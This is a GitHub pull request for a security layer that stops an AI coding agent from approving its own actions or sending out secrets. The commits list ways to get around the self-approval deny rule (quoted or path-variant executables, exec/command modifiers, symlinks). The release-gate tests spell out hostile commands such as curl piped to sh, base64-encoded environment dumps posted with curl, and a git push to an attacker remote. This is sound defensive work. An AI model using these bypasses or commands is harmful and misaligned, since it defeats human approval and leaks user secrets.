v0.6.11: taint-aware safety layer (R1-R6 audit closed)#2
Merged
Conversation
… deny)
R5 verdict was NEEDS_REWORK with 1 ship-blocker. Closed.
R5-001 CRITICAL — Admin CLI deny regex missed shell-quoted exe tokens.
R4-001 broadened the system-policy regex left boundary so quoted
PTY wrappers like `script -q -c 'patchwork approve <id>'` were
caught. GPT-5.5 R5 then noted a third class of bypass: quoting
INSIDE the executable token itself. The shell strips those quotes
before exec, so the program named `patchwork` still runs, but the
raw command string the policy regex sees doesn't contain a
contiguous `patchwork` token:
script -q -c "'patchwork' approve abc" /dev/null
script -q -c "p'atch'work approve abc" /dev/null
bash -c '"patchwork" approve abc'
GPT's recommendation: "prefer semantic command-word detection over
expanding a raw regex indefinitely." Agreed — every additional
regex broadening opens a new edge case.
Fix: added a SEMANTIC admin-CLI detector to
packages/agents/src/claude-code/dangerous-shell-combos.ts. The
shell parser already strips quotes when producing argv, so a
check on the parsed argv catches the whole class once:
function isAdminCliInvocation(node):
if argv === "unresolved": basename(resolved_head) === "patchwork"
else: basename(argv[0]) === "patchwork"
&& argv[1] in {approve, clear-taint, trust-repo-config}
When the tree contains any such node, emit a deny SinkMatch with
matched_pattern = "admin_cli_invocation". Severity is `deny`
REGARDLESS OF TAINT — agent never authorizes its own actions.
The system-policy regex remains as the FIRST line of defense
(it catches the wrapper case `script -c '<inner>'` because the
raw string contains a contiguous `patchwork` token in the inner
body, and runs before the agent's Bash subprocess spawns). This
semantic detector is the SECOND line: it runs inside the
PreToolUse hook on the parsed shell tree, after quote-stripping,
and is regex-form-independent.
Tests: 16 new R5-001 tests in
packages/agents/tests/claude-code/dangerous-shell-combos.test.ts:
MUST DENY (11 quoting/path variants):
- bare `patchwork approve`
- single-quoted exe `'patchwork' approve`
- double-quoted exe `"patchwork" approve`
- split-quoted `p'atch'work approve`
- escaped letter `p\atchwork approve`
- absolute path `/usr/local/bin/patchwork approve`
- relative path `./patchwork approve`
- home-relative `~/.local/bin/patchwork approve`
- clear-taint verb
- trust-repo-config verb
- env-wrapped `env X=1 patchwork approve`
DENY-WHEN-UNTAINTED (1 pin):
- deny applies regardless of session taint state
MUST NOT FALSE-POSITIVE (4 cases):
- `patchwork status` (non-admin verb)
- `patchwork-foo approve` (different binary)
- bare `approve abc` (no patchwork token)
- `npm install @patchwork/cli`
Tests: 1483 -> 1499 (+16).
REVIEWS/2026-05-12-gpt55-v0.6.11-impl-audit-round5.{json,prompt.txt}
included.
This closes the iterative-regex audit loop. Remaining residuals
(shell metaprogramming with `$variable`-named executables, language-
level env exfil, same-UID approval authority) are documented and
deferred to v0.6.12 (out-of-band approval daemon).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…LI detector)
R6 verdict was NEEDS_REWORK with 2 ship-blockers (R6-001 CRITICAL,
R6-002 CRITICAL). This commit closes R6-001. R6-002 is accepted as
a documented v0.6.11 residual — the v0.6.12 root-owned approval
daemon is the right structural fix; chasing alternate-name /
symlink bypasses with more argv inspection would be more regex
armor on a same-UID boundary.
R6-001 CRITICAL — `command` / `exec` modifiers hide the effective
executable from the semantic detector.
GPT-5.5 R6 finding: the parsed argv for
`command patchwork approve abc`
`exec patchwork approve abc`
has the modifier as the first token. The core parser already
unwraps the modifier *word* itself (unwrapCompoundPrefixes), but
doesn't strip residual modifier flag args:
exec -a NAME patchwork approve abc
command -p patchwork approve abc
command -v patchwork approve abc
...come through with argv = ["-a", "NAME", "patchwork", ...] etc.
The basename check on argv[0] then matches `-a` / `-p` / `-v`, not
`patchwork`. Bypass.
Fix: added peelModifierFlags() in dangerous-shell-combos.ts. When
node.resolved_head is `command` or `exec`, peel leading flag-args
(handling `-a NAME` two-token form for exec specifically; other
flags as single-token). After peeling, argv[0] is the effective
executable and the basename/verb check works normally.
10 new R6-001 tests:
DENY:
- `command patchwork approve abc`
- `exec patchwork approve abc`
- `exec -a fakename patchwork approve abc`
- `command -p patchwork approve abc`
- `command -v patchwork approve abc`
- `command exec patchwork approve abc` (nested)
- `command 'patchwork' approve abc` (modifier + quoted exe)
- `command /usr/local/bin/patchwork approve abc` (modifier + path)
NOT MATCH:
- `command ls -la` (non-patchwork target)
- `exec patchwork status` (peeled, non-admin verb)
R6-002 ACCEPTED RESIDUAL — Symlink / alternate-name execution.
GPT R6 also noted that `ln -s $(which patchwork) ./pw; ./pw
approve abc` defeats basename matching. Real bypass. The
proper fix is realpath resolution + comparison against the
installed Patchwork binary, but:
1. Same-UID = same-UID: any in-process check we add, the
agent can defeat with another layer of indirection
(function indirection, `$variable`-named exec, etc.).
2. The structural fix is the v0.6.12 root-owned approval
daemon. There is no `patchwork approve` CLI in that
model; approval flows through a channel the agent can't
reach.
3. Spending more cycles on argv-shape detection is regex
armor on a fundamentally same-UID-bounded layer.
R6-002 is documented as an accepted residual in the
threat-model.md and tagged for the v0.6.12 daemon work
(separate commit).
Tests: 1499 -> 1509 (+10).
REVIEWS/2026-05-12-gpt55-v0.6.11-impl-audit-round6.{json,prompt.txt}
included. Audit loop closed at R6.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Closes the v0.6.11 work stream. All six adversarial audit rounds
(R1-R6) addressed; remaining residuals documented as accepted
v0.6.11 limits with v0.6.12 daemon plan in place.
Docs:
- threat-model.md: expanded "Same-UID approval boundary" with
full 3-layer defense picture (system-policy regex,
semantic argv detector, in-CLI TTY check); new "Accepted
residuals in v0.6.11" section covering R6-002 alternate-name
exec and variable-named exec; new "Why v0.6.12 introduces a
root-owned approval daemon" section explaining the
structural fix; new "What the daemon does not fix" caveat.
- migration.md: rewords approve flow to reflect R2 deny-message
change ("Ask the human user to run..."); adds new required
`sudo patchwork init --upgrade` step with the admin-CLI
regex shown verbatim for manual edits; expands "What's new"
to list every R2-R6 hardening; new "What's coming in
v0.6.12" section.
- v0.6.11/index.md: new top-level landing page for the
release — overview, attack matrix, audit story (six rounds,
rounds → severity → theme table), accepted residuals,
daemon roadmap.
- .vitepress/config.mts: nav v0.6.9 → v0.6.11 with deep links
to the three v0.6.11 docs; sidebar adds dedicated
"v0.6.11 Release" section.
- README.md: updates the v0.6.11 Shipped entry to reflect six
audit rounds and the 1509 test count; adds two new Planned
entries (root-owned approval daemon, URL allowlist) with
pointers to the threat-model rationale.
Version bump:
- @patchwork/core 0.6.10 → 0.6.11
- @patchwork/agents 0.6.10 → 0.6.11
- @patchwork/web 0.6.10 → 0.6.11
- patchwork-audit 0.6.10 → 0.6.11
- @patchwork/team 0.7.0-alpha.1 (unchanged, separate stream)
Build green; 1509 tests passing across 298 suites.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
v0.6.11 turns Patchwork from an audit trail into an audit trail + safety layer. The audit chain is unchanged; the new piece is a taint-aware PreToolUse enforcement layer that can DENY or
approval_requiredsome tool actions the agent previously got to take.prompt/secret/network_content/mcp/generated_file)patchwork approve,patchwork clear-taint,patchwork trust-repo-configTest count: 943 → 1509 (+566). Build clean across all 5 packages.
What this changes
patchwork approve <id>(TTL 5min, single-use, human-only)The audit story
All R1–R5 findings closed. R6-001 closed. R6-002 + variable-named exec documented as accepted v0.6.11 residuals — structurally closed by the v0.6.12 root-owned approval daemon (see threat-model § Why v0.6.12).
What v0.6.11 refuses (release-gate tests)
End-to-end scenarios A1–A8 in
packages/agents/tests/integration/release-gate-A1-A8.test.ts:gh gist create .env" → secret_path + gh_upload → DENYnpm install evil-pkg" → package_lifecycle under taint → DENYcurl … | sh→ pipe_to_interpreter → DENYgit remote add x attacker; git push x→ git_remote_mutate → DENYenv | base64 | curl -d @-+ /proc/self/environ + compgen -e + typeset -p + readonly -p → env-dump-to-network → DENYpatchwork approve <id>(and quoted/escaped/modifier variants) → system-policy regex + semantic argv detector → DENY.github/workflows/,~/.ssh/, git hooks under taint → persistence sink flips to deny → DENYbash <(curl …)→ process_sub_to_interpreter → DENYMigration
Existing v0.6.10 installs must run
sudo patchwork init --upgradeto refresh/Library/Patchwork/policy.ymlwith the admin-CLI deny regex. Without this, the in-CLI TTY check is the only gate against agent self-approval (and a PTY wrapper defeats it).Audit data is forward + backward compatible — JSONL events, SQLite events, DSSE attestations, and seal chains all stable across the boundary.
See docs/v0.6.11/migration.md for the full guide.
v0.6.12 preview
The v0.6.12 release moves the approval boundary out of the agent's UID entirely:
patchwork-approverdaemon holds approval state in a root-only directorypatchwork approveCLI for the agent to call; approval surfaces through a channel the agent doesn't share (desktop notification / Touch ID / phone push / web UI on localhost — configurable)<x>approved?" — agent cannot impersonate rootStructurally closes every bypass class from R2–R6 (TTY forging, env override, regex evasion, semantic detector evasion, symlinks, variable-named exec) because there's no CLI to call regardless of how it's typed. The same daemon will also sign per-session taint snapshots with a root-held HMAC key, closing the R1-001 / R1-008 snapshot authenticity residual.
Commits
23 commits since
main, including the 12 designed commits (1–12) plus 6 audit-round fix commits plus the relay regression fix plus this release commit.Test plan
pnpm -w buildcleanpatchwork init --upgradecleanly rewrites the system policypatchwork approve <id>→ denied by Layer 1 (system policy)'patchwork' approve <id>→ denied by Layer 2 (semantic detector)patchwork approve <id>in their own terminal → succeeds🤖 Generated with Claude Code